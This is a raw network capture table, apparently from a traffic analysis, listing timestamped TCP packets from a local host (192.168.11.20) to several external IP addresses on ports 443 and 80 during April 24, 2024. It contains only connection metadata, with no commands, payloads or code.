                                                                    Apr 24, 2024 12:27:28.797445059 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.797523975 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.797559023 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.797712088 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.797840118 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.797934055 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.798098087 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.798098087 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.798162937 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.798162937 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.798199892 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.798579931 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143023968 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143028021 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143151999 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143220901 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143220901 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143399000 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143399000 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143424988 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143435955 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143572092 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143572092 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143588066 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143764019 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143764019 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143764019 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143764019 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143776894 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143868923 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.143893003 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.143893957 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.144087076 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144087076 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144087076 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144087076 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144087076 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144087076 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144087076 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144097090 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.144290924 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144290924 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144290924 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144290924 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144290924 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.144290924 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.489454031 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.489553928 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.489685059 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.489748001 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.489748001 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.489789009 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.490004063 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.490545034 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.490613937 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.490761995 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.490762949 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.490983009 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.490983009 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491053104 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.491122007 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491350889 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491578102 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.491633892 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.491767883 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491914988 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491914988 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491914988 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491915941 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.491977930 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.492312908 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.492803097 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.492861032 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.492971897 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.492973089 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.492973089 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493050098 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493050098 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493050098 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493051052 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493051052 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493051052 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493109941 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.493413925 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493462086 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.493478060 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.493611097 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493612051 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493659973 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493659973 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493659973 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493659973 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493675947 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.493840933 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493840933 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.493850946 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.493875027 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.494074106 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.494074106 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.494074106 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.494074106 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.494074106 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.494096041 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.494116068 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.494116068 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.494229078 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.840065002 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.840202093 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.840289116 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.840289116 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.840404034 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.840477943 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.840478897 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.840691090 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.841120958 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.841195107 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.841305971 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.841485023 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.841546059 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.841723919 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.842144966 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.842200041 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.842355013 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.842355013 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.842462063 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.842494011 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.842746019 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843077898 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.843125105 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.843298912 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843300104 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843300104 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843300104 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843300104 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843300104 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843420029 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.843472004 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843472958 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843472958 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843707085 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.843911886 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.843959093 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.844088078 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844089031 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844273090 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844273090 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844273090 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844274044 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844347954 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.844444036 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.844507933 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844553947 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.844593048 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844593048 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844593048 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844655991 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:29.844675064 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844675064 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844738007 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844928980 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.844928980 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:29.845000029 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:59.552263975 CEST5024580192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:27:59.855158091 CEST805024551.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:27:59.855506897 CEST5024580192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:27:59.857388020 CEST5024580192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:28:00.160402060 CEST805024551.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:28:00.163288116 CEST805024551.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:28:00.163360119 CEST805024551.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:28:00.163691044 CEST5024580192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:28:00.166098118 CEST5024580192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:28:00.469070911 CEST805024551.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:28:20.534322977 CEST5024680192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:20.844762087 CEST805024664.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:20.845125914 CEST5024680192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:20.846646070 CEST5024680192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:21.157947063 CEST805024664.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:21.158035040 CEST805024664.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:21.158258915 CEST5024680192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:22.347575903 CEST5024680192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:23.365036011 CEST5024780192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:23.675642014 CEST805024764.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:23.675931931 CEST5024780192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:23.677385092 CEST5024780192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:23.988703966 CEST805024764.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:23.988786936 CEST805024764.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:23.989079952 CEST5024780192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:25.190685987 CEST5024780192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.208053112 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.521457911 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:26.521738052 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.524324894 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.837842941 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:26.837908030 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:26.837949991 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:26.837996960 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:26.838046074 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:26.838108063 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.838172913 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.838218927 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.838303089 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:26.838572025 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:26.838733912 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:27.151762962 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.151837111 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.151885986 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.151935101 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.151990891 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.152008057 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:27.152061939 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:27.152120113 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:27.152407885 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.152460098 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.152592897 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.465636969 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.465702057 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.465743065 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.465867996 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.466087103 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.466145992 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.466192007 CEST805024864.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:27.466365099 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:28.033823967 CEST5024880192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:29.051306963 CEST5024980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:29.362024069 CEST805024964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:29.362413883 CEST5024980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:29.363822937 CEST5024980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:29.675548077 CEST805024964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:29.675615072 CEST805024964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:29.676075935 CEST5024980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:29.678113937 CEST5024980192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:28:29.988780022 CEST805024964.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:28:51.833702087 CEST5025080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:52.012505054 CEST8050250108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:52.012728930 CEST5025080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:52.014128923 CEST5025080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:52.193074942 CEST8050250108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:52.193205118 CEST8050250108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:52.193216085 CEST8050250108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:52.193227053 CEST8050250108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:52.193464994 CEST5025080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:53.528027058 CEST5025080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:54.545541048 CEST5025180192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:54.722803116 CEST8050251108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:54.723103046 CEST5025180192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:54.724514961 CEST5025180192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:54.902451992 CEST8050251108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:54.902565956 CEST8050251108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:54.902575016 CEST8050251108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:54.902584076 CEST8050251108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:54.902776003 CEST5025180192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:56.230586052 CEST5025180192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.248106956 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.422230005 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.422413111 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.424940109 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.424998999 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.425057888 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.599008083 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.599121094 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.599211931 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.599260092 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.599289894 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.599301100 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.599489927 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.599994898 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.600004911 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.600013018 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.600022078 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.600208998 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.773274899 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.773413897 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.773420095 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.773480892 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.773534060 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.773662090 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.773703098 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.773792028 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.773869038 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:57.774012089 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.947468042 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.947623968 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.947802067 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:57.947926998 CEST8050252108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:28:58.933145046 CEST5025280192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:28:59.950604916 CEST5025380192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:29:00.125494957 CEST8050253108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:29:00.125654936 CEST5025380192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:29:00.127063036 CEST5025380192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:29:00.302531004 CEST8050253108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:29:00.302635908 CEST8050253108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:29:00.302645922 CEST8050253108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:29:00.302862883 CEST5025380192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:29:00.305957079 CEST5025380192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:29:00.480607033 CEST8050253108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:29:05.538485050 CEST5025480192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:05.868913889 CEST805025484.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:05.869383097 CEST5025480192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:05.871361017 CEST5025480192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:06.201678991 CEST805025484.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:06.201848030 CEST805025484.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:08.402177095 CEST5025580192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:08.737000942 CEST805025584.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:08.737171888 CEST5025580192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:08.738596916 CEST5025580192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:09.073338985 CEST805025584.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:09.073494911 CEST805025584.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:11.260644913 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.593152046 CEST805025684.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:11.593395948 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.595972061 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.596023083 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.596069098 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.929236889 CEST805025684.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:11.929392099 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.929409981 CEST805025684.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:11.929439068 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.929491043 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:11.929660082 CEST5025680192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:12.262763977 CEST805025684.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:12.262806892 CEST805025684.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:14.119729996 CEST5025780192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:14.454852104 CEST805025784.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:14.454993963 CEST5025780192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:14.456446886 CEST5025780192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:29:14.791318893 CEST805025784.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:29:14.791452885 CEST805025784.32.84.32192.168.11.20
